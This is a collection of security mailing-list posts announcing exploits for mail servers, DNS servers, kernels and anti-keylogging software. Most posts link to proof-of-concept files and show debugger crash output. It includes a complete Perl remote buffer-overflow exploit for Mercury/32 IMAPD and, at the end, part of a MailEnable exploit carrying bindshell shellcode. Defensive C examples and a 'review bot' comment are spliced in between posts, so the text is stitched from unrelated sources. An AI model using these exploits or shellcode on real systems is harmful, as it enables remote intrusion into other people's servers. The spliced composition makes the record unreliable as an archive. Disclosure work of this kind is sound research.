[Full-disclosure] Trusteer Rapport and anti-keylogging
All -

It has been a few weeks now since I demonstrated the following at 44con (http://www.44con.com) and thus time to just dump the details here.

The following are what can only be described as 'design flaws' in Trusteer Rapport's anti-keylogger protections, that is, Rapport provides the functionality to decrypt keys to *everyone*, along with the ability to 'switch off' anti-keylogger protections altogether. However, I should say that in the latter case, Trusteer aren't the only ones to provide such functionality; KeyScrambler does also. This is somewhat documented in the following post:

http://www.digit-security.com/blog/?p=47

The following are for OSX *only*, but you can extend these to Windows trivially (the ioctl obfuscation layer is easily bypassed by using Trusteer's own code).

http://.digit-security.com/files/exploits/rapport-switchoff.c
- switches off anti-keylogger protections on OSX, allowing your already existing keylogger to function correctly once again.

http://.digit-security.com/files/exploits/rapport-listen.c
- uses Trusteer's own functionality to 'decrypt' keys directly.

-- 
mu-b (m...@digit-labs.org)

Only a few people will follow the proof. Whoever does will spend
the rest of his life convincing people it is correct.
- Anonymous, P ?= NP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NovaStor NovaNet <= 13.0 issues
All -

many of the following were inexplicably fixed in the latest version (NovaBACKUP Network 13.0), but still, a 2.5 year run isn't too bad...

http://digit-labs.org/files/exploits/novanet-own-lnx.c
- linux remote root <= 12.0

http://digit-labs.org/files/exploits/novanet-read.c
- arbitrary remote dword read <= 12.0

http://digit-labs.org/files/exploits/novanet-own.c
- Windows (no-DEP/NX, NovaNet 11.0) remote SYSTEM <= 12.0 (messy, there is a cleaner version)

They seem to have missed the last one, so it still works on 13.0, but sadly the most useless :(

http://digit-labs.org/files/exploits/novanet-dos.c
- null deref remote DoS <= 13.0

-- 
mu-b (m...@digit-labs.org)
[Full-disclosure] un-SafeCentral
All -

well, it would seem that SafeCentral (www.safecentral.com) really isn't all that safe! Of course it is 'safe', that is, secure, under the assumption that Authentium seem to behold that all malware coders are obviously idiots. Those that aren't idiots would not really find it all that hard to break..

http://www.digit-labs.org/files/otherstuff/unsafecentral/

-- 
mu-b (m...@digit-labs.org)
Re: [Full-disclosure] VMSA-2009-0013 VMware Fusion resolves two security issues
All -

the first bug is self-explanatory,

# Kernel denial of service vulnerability

An integer overflow vulnerability in the vmx86 kernel extension allows for a denial of service by an unprivileged user.

The vmx86 kext ioctl handler contains several integer overflows which lead to kernel heap corruptions. These are probably not exploitable, and I didn't try given the second bug,

http://www.digit-labs.org/files/exploits/vmware-pop.c

# Kernel code execution vulnerability

An ioctl vulnerability in the vmx86 kernel extension allows for executing arbitrary code in the kernel context by an unprivileged user.

The vmx86 kext ioctl handler permits an unprivileged userland program to initialize several function pointers via the 0x802E564A ioctl code. These function pointers are later used from several reachable locations within the driver, one of which is called immediately after initialization.

http://www.digit-labs.org/files/exploits/vmware-fission.c

-- 
mu-b (m...@digit-labs.org)
Re: [Full-disclosure] FreeBSD/OS X kernel bug dump
thanks to the person who bothered to let me know the links were *slightly* wrong, that is what you get trying to stay awake to beat jet-lag...

Quoting m...@digit-labs.org:

> All -
>
> the following are the exploits from the recent demonstrations at
>
> Apple Mac OSX = 10.4.0 local kernel root
> http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl-v2.c
> http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl-v2.sh
>
> FreeBSD = 7.0 ktimer local kernel root
> (http://security.freebsd.org/advisories/FreeBSD-SA-09:06.ktimer.asc)
> http://www.digit-labs.org/files/exploits/bsd-ktimer.c
>
> other random stuff..
> http://www.digit-labs.org/files/exploits/xnu-macfsstat-leak.c
> http://www.digit-labs.org/files/exploits/xnu-profil-leak.c
> http://www.digit-labs.org/files/exploits/xnu-appletalk-zip.c
>
> all the above are old now, but still exist today...
>
> christer/mu-b
>
> --
> mu-b (m...@digit-labs.org)
[Full-disclosure] FreeBSD/OS X kernel bug dump
All -

the following are the exploits from the recent demonstrations at

Apple Mac OSX = 10.4.0 local kernel root
http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl.c
http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl.sh

FreeBSD = 7.0 ktimer local kernel root
(http://security.freebsd.org/advisories/FreeBSD-SA-09:06.ktimer.asc)
http://www.digit-labs.org/files/exploits/bsd-ktimer.c

other random stuff..
http://www.digit-labs.org/files/exploits/xnu-macfsstat-leak.c
http://www.digit-labs.org/files/exploits/xnu-profil-leak.c
http://www.digit-labs.org/files/exploits/xnu-appletalk-zip.c

all the above are old now, but still exist today...

christer/mu-b

-- 
mu-b (m...@digit-labs.org)
[Full-disclosure] eXtremail(ly easy) remote roots
The attached either exploit or demonstrate a rash of remotely exploitable bugs in eXtremail <= 2.1.1 which perhaps should be renamed to the more apt name of eXtremely-rootable-mail... of course, in the grand scheme, these are more-or-less completely useless!..

*) extremail-v3.pl demonstrates two vulnerabilities, the first a denial of service caused by an integer underflow into the length argument of a call to memmove(). This is caused by the author replacing every occurrence of %s with %%s (before logging the resulting string to a file; perhaps the author is still somewhat paranoid after the re-occurrence of older format string vulnerabilities :-)) whilst forgetting to take into account that the string actually gets longer by a single byte after each replace!.

The second bug is rather interesting and is either a failure in GCC points-to analysis or a consequence of the author neglecting the possibility that a temporary pointer to a heap buffer may have changed after a call to realloc (ifReservaMasMem) and refreshing the pointer to the heap buffer given as argument (which may have been free()'d). (I would tend to believe the latter..) This results in the overwriting of potentially free'd memory with user-definable data (albeit very restricted).

PoC: http://www.digit-labs.org/files/exploits/extremail-v3.pl

*) extremail-v4.c - trivial remote stack-overflow in the admin interface.

PoC: http://www.digit-labs.org/files/exploits/extremail-v4.c

*) extremail-v5.c - remote heap overflow in CRAM-MD5 authentication.

PoC: http://www.digit-labs.org/files/exploits/extremail-v5.c

*) extremail-v6.c - trivial remote stack-overflow in PLAIN authentication.

PoC: http://www.digit-labs.org/files/exploits/extremail-v6.c

*) extremail-v7.c - THIS PAGE UNINTENTIONALLY LEFT BLANK (I appear to have misplaced it, but given that eXtremail is holier than the pope himself, I shouldn't think it would take too long to fill.)

*) extremail-v8.pl demonstrates a remote heap overflow in the recv()-loop whereby the author has mistakenly assumed that the string length of all currently received data is at least equal to the sum of all return values from each call to recv(). (trivial contradiction follows if we send() the first buffer containing \x00). This causes an incorrect number of bytes to be reallocated and a remote heap overflow in a call to memcpy().

PoC: http://www.digit-labs.org/files/exploits/extremail-v8.pl

-- 
mu-b ([EMAIL PROTECTED])
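The two length-accounting mistakes described above for extremail-v3.pl (the escaped string grows by one byte per replacement) and extremail-v8.pl (strlen() of the received data is not the number of bytes recv() returned), written the other way round. This is an added example in C; it is not eXtremail's code nor mu-b's PoC, the function and struct names are my own, and the input strings and chunks are constructed. escape_percent doubles every '%' (more general than the %s-only replacement the post describes) and computes the output size before writing anything; recvbuf_append keeps the byte count itself, so a chunk that begins with a NUL byte is still counted in full.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Copy `in` to `out`, doubling every '%' so the result can be handed to a
 * printf-style logger as a format string.  Each '%' makes the output one
 * byte longer, so the required size is computed before anything is written.
 * Returns the number of bytes written (excluding the NUL), or -1 if the
 * escaped string does not fit in `outsize`. */
long escape_percent(const char *in, char *out, size_t outsize)
{
    size_t needed = 0;
    for (const char *p = in; *p != '\0'; p++)
        needed += (*p == '%') ? 2 : 1;
    if (needed + 1 > outsize)            /* +1 for the terminating NUL */
        return -1;

    char *o = out;
    for (const char *p = in; *p != '\0'; p++) {
        *o++ = *p;
        if (*p == '%')
            *o++ = '%';
    }
    *o = '\0';
    return (long)needed;
}

/* Growable receive buffer.  `len` is the number of bytes appended so far and
 * is the only source of truth for how much data is present; strlen() on the
 * data would stop at the first NUL and under-count. */
struct recvbuf {
    unsigned char *data;
    size_t len;
    size_t cap;
};

/* Append one chunk (the bytes one recv() call returned).
 * Returns 0 on success, -1 on size overflow or allocation failure. */
int recvbuf_append(struct recvbuf *b, const unsigned char *chunk, size_t n)
{
    if (n > SIZE_MAX - b->len - 1)
        return -1;
    size_t need = b->len + n + 1;        /* one spare byte for a NUL */
    if (need > b->cap) {
        size_t ncap = b->cap ? b->cap : 64;
        while (ncap < need)
            ncap = (ncap > SIZE_MAX / 2) ? need : ncap * 2;
        unsigned char *p = realloc(b->data, ncap);
        if (p == NULL)
            return -1;
        b->data = p;
        b->cap = ncap;
    }
    memcpy(b->data + b->len, chunk, n);
    b->len += n;
    b->data[b->len] = '\0';
    return 0;
}

/* Constructed input: two chunks, the first beginning with a NUL byte. */
static void feed_sample(struct recvbuf *b)
{
    static const unsigned char chunk1[] = { '\0', 'A', 'B', 'C' };
    static const unsigned char chunk2[] = { 'D', 'E', 'F', 'G' };
    memset(b, 0, sizeof *b);
    recvbuf_append(b, chunk1, sizeof chunk1);
    recvbuf_append(b, chunk2, sizeof chunk2);
}

size_t demo_tracked_len(void)
{
    struct recvbuf b;
    feed_sample(&b);
    size_t len = b.len;                  /* 8: every received byte counted */
    free(b.data);
    return len;
}

size_t demo_strlen_view(void)
{
    struct recvbuf b;
    feed_sample(&b);
    size_t s = strlen((const char *)b.data);   /* 0: stops at the leading NUL */
    free(b.data);
    return s;
}

/* Escape a fixed 17-byte sample (one '%') into a buffer of `outsize` bytes. */
long demo_escape(size_t outsize)
{
    char out[64];
    if (outsize > sizeof out)
        return -1;
    return escape_percent("user %s logged in", out, outsize);
}
```

The difference between demo_tracked_len and demo_strlen_view is exactly the gap extremail-v8.pl exploits: a realloc sized from strlen() would reserve 0 bytes while 8 are about to be copied.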
[Full-disclosure] SafeNET High Assurance Remote/SoftRemote (IPSecDrv.sys) remote DoS
Attached is POC for a remote DoS in IPSecDrv.sys shipped with SafeNET High Assurance Remote and SoftRemote. The version tested is 10.4.0.12.

The bug itself is due to SafeNET making a complete hash of IPv6 support for IPSec. The result of the code is a complete DoS of the machine in Kernel mode whilst the driver proceeds to enter an infinite loop (apparently looking for a suitable IPSec extension header, which it will never find). The dodgy code can be found at offset 0x1000BEB0 of IPSecDrv.sys (10.4.0.12).

The attached code will only work over local subnets, however this is trivially remote with IPv6.

PoC: http://www.digit-labs.org/files/exploits/safenet-dos.c

hmmm, I wonder how SafeNET think they can charge for such a half-baked, crufty, god-awful implementation

-- 
mu-b ([EMAIL PROTECTED])
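The failure mode above is a header walk that never terminates. As an added example (not SafeNET's driver code nor mu-b's PoC; the function names and the sample packets are my own), this is how an IPv6 extension-header walk looking for ESP or AH stays bounded: each step either returns or advances by at least the header's own length, every length is checked against the bytes actually present, and a hard cap limits the chain. The packets are constructed inline, not captures.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IPV6_HDR_LEN    40
#define MAX_EXT_HEADERS 16   /* hard cap on how many headers are walked */

enum {
    NH_HOPOPT   = 0,
    NH_TCP      = 6,
    NH_ROUTING  = 43,
    NH_FRAGMENT = 44,
    NH_ESP      = 50,
    NH_AH       = 51,
    NH_DSTOPTS  = 60
};

/* Walk the IPv6 extension-header chain looking for ESP or AH.  Returns the
 * byte offset of that header, or -1 if the chain ends in another protocol,
 * any header would run past the packet, or the cap is hit.  Every iteration
 * either returns or moves `off` forward by at least 8 bytes, so a crafted
 * packet cannot make the loop spin. */
long find_ipsec_header(const uint8_t *pkt, size_t len)
{
    if (len < IPV6_HDR_LEN || (pkt[0] >> 4) != 6)
        return -1;

    uint8_t nh = pkt[6];
    size_t off = IPV6_HDR_LEN;

    for (int i = 0; i < MAX_EXT_HEADERS; i++) {
        if (nh == NH_ESP || nh == NH_AH)
            return (len - off >= 8) ? (long)off : -1;   /* SPI + sequence */

        size_t hlen;
        switch (nh) {
        case NH_HOPOPT:
        case NH_ROUTING:
        case NH_DSTOPTS:
            if (len - off < 2)
                return -1;
            hlen = ((size_t)pkt[off + 1] + 1) * 8;  /* 8-octet units, excl. first 8 */
            break;
        case NH_FRAGMENT:
            hlen = 8;
            break;
        default:
            return -1;   /* upper-layer protocol or No Next Header: no IPsec */
        }
        if (hlen > len - off)
            return -1;   /* header claims more bytes than the packet holds */
        nh = pkt[off];   /* first byte of every extension header: Next Header */
        off += hlen;
    }
    return -1;
}

/* Constructed sample: IPv6 header, one Hop-by-Hop header whose Hdr Ext Len
 * field is `hbh_len_field`, then 8 bytes of a header of type `final_nh`.
 * Returns the packet length written to `out`, 0 if `cap` is too small. */
size_t build_sample(uint8_t *out, size_t cap, uint8_t final_nh, uint8_t hbh_len_field)
{
    size_t total = IPV6_HDR_LEN + 8 + 8;
    if (cap < total)
        return 0;
    memset(out, 0, total);
    out[0] = 0x60;                          /* version 6 */
    out[5] = 16;                            /* payload length */
    out[6] = NH_HOPOPT;                     /* first extension header */
    out[7] = 64;                            /* hop limit */
    out[IPV6_HDR_LEN]     = final_nh;       /* hop-by-hop: Next Header */
    out[IPV6_HDR_LEN + 1] = hbh_len_field;  /* hop-by-hop: Hdr Ext Len */
    return total;
}

/* Build a sample and walk it, optionally truncated to `use_len` bytes. */
long walk_sample(uint8_t final_nh, uint8_t hbh_len_field, size_t use_len)
{
    uint8_t pkt[64];
    size_t n = build_sample(pkt, sizeof pkt, final_nh, hbh_len_field);
    if (n == 0)
        return -1;
    if (use_len != 0 && use_len < n)
        n = use_len;
    return find_ipsec_header(pkt, n);
}
```

walk_sample(NH_ESP, 0, 0) finds ESP at offset 48; a Hop-by-Hop length field of 200 (claiming 1608 bytes) or a packet cut off at 50 bytes is rejected rather than walked.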
[Full-disclosure] mydns-1.1.0 remote heap overflow
The attached PoC causes a remote heap smash in mydns 1.1.0; the bug is found within the dynamic update code (update.c). Exploitation requires update privs (which tends not to matter too much if you know an IP address with privileges to do so); also allow-update = yes must be set in /etc/mydns.conf. The attached patch also fixes a stack based off-by-one overflow in update.c.

Example :-

0xb7f27410 in __kernel_vsyscall ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0805d0e2 in ?? ()
(gdb) x/i $eip
0x805d0e2 [EMAIL PROTECTED]:    rep movsb %ds:(%esi),%es:(%edi)

PoC: http://www.digit-labs.org/files/exploits/mydns-rr-smash.c
Patch: http://www.digit-labs.org/files/patches/mydns-update.c.diff

-- 
mu-b ([EMAIL PROTECTED])
[Full-disclosure] eXtremail-v9
The attached POC exploits a trivial stack smash in the DNS parsing code of eXtremail versions <= 2.1.1 (current). The POC attached is rather trivial in that it simply answers queries with a suitable response (to exhibit the overflow). However, the problem is further compounded by the fact that eXtremail neglects to even verify the validity of the transaction id in any responses, and thus is trivially vulnerable to DNS spoofing attacks (I am *pretty* sure a more *inventive* method of exploitation exists to yield trivial remote root...).

Program received signal SIGSEGV, Segmentation fault.
0xdeadbeef in ?? ()
(gdb) bt
#0  0xdeadbeef in ?? ()
#1  0x3031002e in ?? ()
#2  0x00003634 in ?? ()
#3  0x00000000 in ?? ()
(gdb)

POC: http://www.digit-labs.org/files/exploits/extremail-v9.c

-- 
mu-b ([EMAIL PROTECTED])
Re: [Full-disclosure] dproxy - arbitrary code execution through stack buffer overflow vulnerability
you might want to NULL terminate query_string while you're there

Alexander Klink wrote:

||| Security Advisory AKLINK-SA-2007-001 |||
||| CVE-2007-1465 (CVE candidate)        |||

dproxy - remotely exploitable buffer overflow

Date released: 20.03.2007
Date reported: 11.03.2007
$Revision: 1.1 $

by Alexander Klink
   Cynops GmbH
   [EMAIL PROTECTED]
   https://www.cynops.de/advisories/CVE-2007-1465.txt
   (S/MIME signed: https://www.cynops.de/advisories/CVE-2007-1465-signed.txt)
   https://www.klink.name/security/aklink-sa-2007-001-dproxy-bufferoverflow.txt
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1465

Vendor: Matthew Pratt (Open Source)
Product: dproxy - a small caching DNS server
Website: http://dproxy.sourceforge.net
Vulnerability: buffer overflow
Class: remote
Status: unpatched (author is unresponsive)
Severity: high (arbitrary command execution as root)
Releases known to be affected: 0.1, 0.2, 0.3, 0.4, 0.5
Releases known NOT to be affected: dproxy-nexgen

+ Overview:

dproxy suffers from a typical buffer overflow condition, which allows an attacker to overwrite the stack.

+ Technical details:

In dproxy.c, the UDP packet buffer, which can be up to 4096 bytes long, is copied into a variable called query_string, which is at most 2048 bytes. As this is done using strcpy, the stack can be overwritten, which leads to arbitrary command execution.

Note that one can easily find out whether dproxy is running using the fpdns tool (see http://www.rfc.se/fpdns/).

dproxy also seems to be used in a number of WLAN access points / routers, but the version used there (at least in the Linksys WRT54AG, the Asus WL500g and the Netgear DG834G) seems to be dproxy-nexgen, which is not vulnerable to this attack.

Thanks to Dan Kaminsky, who provided me with the interesting statistics that apparently only 20 out of about 2.000.000 DNS servers he scanned are using dproxy. So this does not look like a major attack vector.
+ Exploit: A MetaSploit Framework 2.7 exploit module is available from https://www.cynops.de/downloads/metasploit/dproxy.pm It has been tested successfully with both a Debian stable and an Ubuntu system (with randomize_va_space=0). + Workaround: Drop packets to the destination UDP port 53 which are larger than 2048 bytes (which is a pretty large DNS query packet anyway). + Communication: * 13.03.2007: Author updated on vulnerable versions * 11.03.2007: First problem report to author + Solution: Patch dproxy.c: --- dproxy-0.5/dproxy.c 2000-02-03 04:15:35.0 +0100 +++ dproxy-0.5.patched/dproxy.c 2007-03-13 13:07:53.0 +0100 @@ -105,7 +105,7 @@ /* child process only here */ signal(SIGCHLD, SIG_IGN); - strcpy( query_string, pkt.buf ); + strncpy( query_string, pkt.buf, sizeof(query_string) ); decode_domain_name( query_string ); debug(query: %s\n, query_string ); + Credits: Alexander Klink, Cynops GmbH (discovery and exploit development, patch) -- mu-b ([EMAIL PROTECTED]) Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct. - Anonymous, P ?= NP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
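Review bot: the replacement line `+ strncpy( query_string, pkt.buf, sizeof(query_string) );` in the `@@ -105,7 +105,7 @@` hunk stops the overflow but does not NUL-terminate query_string when pkt.buf is sizeof(query_string) bytes or longer (the advisory says the packet buffer can hold up to 4096 bytes against a 2048-byte query_string), so the following `decode_domain_name( query_string );` and `debug(query: %s\n, query_string );` lines can read past the end of the buffer; copy at most sizeof(query_string) - 1 bytes and set the last byte to '\0' explicitly, or reject packets longer than the buffer before the copy, which is what the advisory's own workaround of dropping over-2048-byte packets does at the network edge.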
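The advisory's technical details (a packet of up to 4096 bytes copied with strcpy into a 2048-byte query_string) and the point raised in the reply about termination, shown in C. This is an added example, not dproxy's code nor the advisory's patch; the function names are my own and the "packets" are constructed runs of 'a' bytes. strncpy_leaves_terminator shows what strncpy() does when the source fills the destination, and copy_query is the bounded copy that refuses over-long input and always terminates, sized from the received length rather than a strlen() that a UDP payload need not satisfy.

```c
#include <stdlib.h>
#include <string.h>

/* Copy `srclen` bytes of packet data into a fixed-size string buffer,
 * refusing anything that would not leave room for the terminator.
 * Returns 0 on success, -1 if the input is too long. */
int copy_query(char *dst, size_t dstsize, const unsigned char *src, size_t srclen)
{
    if (dstsize == 0 || srclen >= dstsize)
        return -1;
    memcpy(dst, src, srclen);
    dst[srclen] = '\0';
    return 0;
}

/* What strncpy() leaves behind: fill a `dstsize` buffer with 'X', strncpy()
 * a `srclen`-byte string into it, and report (1/0) whether any NUL ended up
 * inside the buffer.  When srclen >= dstsize, none does.  -1 on allocation
 * failure. */
int strncpy_leaves_terminator(size_t srclen, size_t dstsize)
{
    char *src = malloc(srclen + 1);
    char *dst = malloc(dstsize);
    int terminated = -1;
    if (src != NULL && dst != NULL) {
        memset(src, 'a', srclen);
        src[srclen] = '\0';
        memset(dst, 'X', dstsize);
        strncpy(dst, src, dstsize);
        terminated = memchr(dst, '\0', dstsize) != NULL;
    }
    free(src);
    free(dst);
    return terminated;
}

/* The dproxy shape: a 2048-byte query_string fed from a UDP packet of up to
 * 4096 bytes.  The packet is a constructed run of `pktlen` 'a' bytes. */
int demo_copy_query(size_t pktlen)
{
    static char query_string[2048];
    unsigned char *pkt = malloc(pktlen ? pktlen : 1);
    if (pkt == NULL)
        return -1;
    memset(pkt, 'a', pktlen);
    int rc = copy_query(query_string, sizeof query_string, pkt, pktlen);
    free(pkt);
    return rc;
}
```

demo_copy_query(2047) succeeds and demo_copy_query(2048) is refused: the last byte of the buffer is reserved for the NUL that decode_domain_name() and the debug logging rely on.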
[Full-disclosure] Mercur SP4 IMAPD
The attached exploits several signedness bugs in the NTLM implementation of Mercur IMAPD (www.atrium-software.com) to give the attacker complete control over a memcpy to a stack variable... (non-authenticated)

In this case, memcpy(buf, src+a, b) with 'a' and 'b' being user controlled and buf ~7208 bytes. Note: due to the most important signedness issue, we can only control 'a' within the range -65535 < a < 65536...

The result of the PoC is a simple crash trying to copy 0x bytes...

(d94.1dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0210a108 ebx=0210ac24 ecx=3fffeb08 edx=00000000 esi=02110000 edi=0210f4e4
eip=0042e0d3 esp=021098c8 ebp=021098d0 iopl=0         nv up ei pl nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010207
*** WARNING: Unable to verify checksum for C:\Program Files\MERCUR\mcrimap4.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\MERCUR\mcrimap4.exe -
mcrimap4!_GetExceptDLLinfo+0x2d05f:
0042e0d3 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]  es:0023:0210f4e4=00000000 ds:0023:02110000=???

PoC: http://www.digit-labs.org/files/exploits/mercur-v1.pl

-- 
mu-b ([EMAIL PROTECTED])
[Full-disclosure] Mercury/32 4.01b
Attached is a remote exploit (disarmed PoC) for Mercury/32 4.01b IMAPD. The vulnerability is located in the call:-

034646AE    call    sub_346ECD9

which passes (as third argument) the number of bytes remaining in a stack buffer in order to construct the complete command from the continuation data. However, the calculation neglects to take into account the length of the previously supplied command (1 LOGIN 900 x '\x20' {255}).

The result of the attached exploit is a DoS (given below); however, remote code execution is possible in at least two different ways without authentication...

(b24.a70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0456d70c ebx=41414141 ecx=7ffad000 edx=034a2970 esi=0500 edi=00000000
eip=00441d88 esp=0456d6dc ebp=0456d6ec iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mercuryi!miconfig_proc_3+0xbacd:
0346ed48 8807            mov     byte ptr [edi],al          ds:0023:04570000=??

(note this may be the same as BID 21110).

-- 
mu-b ([EMAIL PROTECTED])

#!/usr/bin/perl
#
# mercurypown-v1.pl
#
# Mercury/32 v4.01b (win32) remote exploit
# by mu-b - 28 Nov 2006
#
# - Tested on: Mercury/32 v4.01a (win32)
#              Mercury/32 v4.01b (win32)
#
# Stack-based buffer overflow caused by Mercury/32 concatenating
# continuation data into a fixed sized buffer disregarding
# the length of the original command, you do not require authentication.
#
# This is a little harder to exploit than usual since the
# stack frame in question calls end_thread before returning..
# but it's still possible by at *least* two different ways...
# (i.e. controlling a pointer into sprintf and/or controlling
# a pointer to be free()).
#

use Getopt::Std; getopts('t:n:', \%arg);
use Socket;

print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }

if (!(defined($target))) {
  usage;
}

my $imapd_port = 143;
my $send_delay = 1;
my $NOP = 'A';
my $LEN = 9200; #8928;
my $BUFLEN = 8192;

if (connect_host($target, $imapd_port)) {
  print("-> * Connected\n");
  $buf = "1 LOGIN".(" " x ($LEN-$BUFLEN))."\{255\}\n";
  send(SOCKET, $buf, 0);
  sleep($send_delay);

  print("-> * Sending payload\n");
  $buf = $NOP x 255;
  send(SOCKET, $buf, 0);
  sleep($send_delay);

  print("-> * Sending payload 2\n");
  $buf = $NOP x $BUFLEN;
  send(SOCKET, $buf, 0);
  sleep($send_delay);

  print("-> * Successfully sent payload!\n");
}

sub print_header {
  print("Mercury/32 v4.01b (win32) remote exploit\n");
  print("by: [EMAIL PROTECTED]\n\n");
}

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>: hostname to test

  ));
  exit(1);
}

sub connect_host {
  ($target, $port) = @_;

  $iaddr = inet_aton($target) || die("Error: $!\n");
  $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
  $proto = getprotobyname('tcp') || die("Error: $!\n");

  socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  connect(SOCKET, $paddr) || die("Error: $!\n");

  return(1337);
}
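The two server-side mistakes in the Mercur post (user-controlled 'a' and 'b' in memcpy(buf, src+a, b), with 'a' read through a signed type so it can go negative) and the Mercury/32 post above (remaining buffer space computed without the bytes the first command line already used), written as the checks a parser should make. This is an added example in C, not code from either product or from mu-b's PoCs; the names extract_field, cmdbuf and the demo helpers are my own, the 64-byte message and 256-byte command buffer are constructed, and the same offset/length validation applies to the NTLM Type 3 unpacking issue in the MailEnable posts further down.

```c
#include <stdint.h>
#include <string.h>

/* Copy the (offset, length)-addressed field msg[off .. off+len) into `out`.
 * The fields are treated as unsigned 16-bit values and every comparison is
 * done in size_t, so a value that would read as negative through int16_t can
 * neither move the source pointer before `msg` nor make memcpy() run past the
 * end of the message or of `out`.  Returns bytes copied, or -1 if rejected. */
int extract_field(const uint8_t *msg, size_t msglen, uint16_t off, uint16_t len,
                  uint8_t *out, size_t outsize)
{
    if (off > msglen || len > msglen - off || len > outsize)
        return -1;
    memcpy(out, msg + off, len);
    return (int)len;
}

/* The same 16-bit field seen through a signed type: 0xFFFF becomes -1,
 * which as a pointer offset walks backwards from `msg`. */
long as_signed16(uint16_t v)
{
    return (int16_t)v;
}

/* Constructed 64-byte message (byte i holds i); copy into a 32-byte buffer. */
int demo_extract(uint16_t off, uint16_t len)
{
    uint8_t msg[64];
    uint8_t out[32];
    for (size_t i = 0; i < sizeof msg; i++)
        msg[i] = (uint8_t)i;
    return extract_field(msg, sizeof msg, off, len, out, sizeof out);
}

/* Fixed command buffer that an IMAP continuation (the "{n}" literal data) is
 * appended to.  Free space is whatever the first line left over, not the
 * size of the whole buffer. */
struct cmdbuf {
    char   data[256];
    size_t used;
};

/* Append `n` bytes; -1 if they do not fit in the space actually remaining. */
int cmdbuf_append(struct cmdbuf *c, const char *s, size_t n)
{
    size_t room = sizeof c->data - 1 - c->used;   /* keep one slot for NUL */
    if (n > room)
        return -1;
    memcpy(c->data + c->used, s, n);
    c->used += n;
    c->data[c->used] = '\0';
    return 0;
}

/* A first line of `first_len` bytes followed by a continuation of `cont_len`.
 * Returns 0 if both fit, -1 otherwise. */
int demo_continuation(size_t first_len, size_t cont_len)
{
    struct cmdbuf c = { {0}, 0 };
    char first[256], cont[256];
    if (first_len > sizeof first || cont_len > sizeof cont)
        return -1;
    memset(first, 'L', first_len);
    memset(cont, 'C', cont_len);
    if (cmdbuf_append(&c, first, first_len) != 0)
        return -1;
    return cmdbuf_append(&c, cont, cont_len);
}
```

demo_extract(0xFFFF, 4) is refused outright, where an int16_t offset of -1 would have pointed before the message; demo_continuation(100, 156) is refused because only 155 of the 255 usable bytes remain after the first line, which is the calculation the Mercury/32 call site skips.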
[Full-disclosure] MailEnable v2.37 APPEND exploit
Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including the latest). The vulnerability is a bog-standard stack based overflow in the call at offset 0x00417CD6 (MEIMAPS.exe, v2.37).

--- ([EMAIL PROTECTED])

#!/usr/bin/perl
#
# maildisable-v4.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.35 (win32)
#              Mail Enable Professional v2.37 (win32)
#

use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;

# Fixed metasploit win32 bindshell port 1337
my $zshell_win32_bind =
  "\x33\xc9\x83\xe9\xb0".
  "\x81\xc4\xd0\xfd\xff\xff".   # add %esp, -560
  "\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
  "\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
  "\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2".
  "\x52\xd4\xb9\x36\x3d\xcd\xd9\x20\x96\xf8\xb9\x68\xf3\xfd\xf2\xf0".
  "\xb1\x48\xf2\x1d\x1a\x0d\xf8\x64\x1c\x0e\xd9\x9d\x26\x98\x16\x41".
  "\x68\x29\xb9\x36\x39\xcd\xd9\x0f\x96\xc0\x79\xe2\x42\xd0\x33\x82".
  "\x1e\xe0\xb9\xe0\x71\xe8\x2e\x08\xde\xfd\xe9\x0d\x96\x8f\x02\xe2".
  "\x5d\xc0\xb9\x19\x01\x61\xb9\x29\x15\x92\x5a\xe7\x53\xc2\xde\x39".
  "\xe2\x1a\x54\x3a\x7b\xa4\x01\x5b\x75\xbb\x41\x5b\x42\x98\xcd\xb9".
  "\x75\x07\xdf\x95\x26\x9c\xcd\xbf\x42\x45\xd7\x0f\x9c\x21\x3a\x6b".
  "\x48\xa6\x30\x96\xcd\xa4\xeb\x60\xe8\x61\x65\x96\xcb\x9f\x61\x3a".
  "\x4e\x9f\x71\x3a\x5e\x9f\xcd\xb9\x7b\xa4\x37\x50\x7b\x9f\xbb\x88".
  "\x88\xa4\x96\x73\x6d\x0b\x65\x96\xcb\xa6\x22\x38\x48\x33\xe2\x01".
  "\xb9\x61\x1c\x80\x4a\x33\xe4\x3a\x48\x33\xe2\x01\xf8\x85\xb4\x20".
  "\x4a\x33\xe4\x39\x49\x98\x67\x96\xcd\x5f\x5a\x8e\x64\x0a\x4b\x3e".
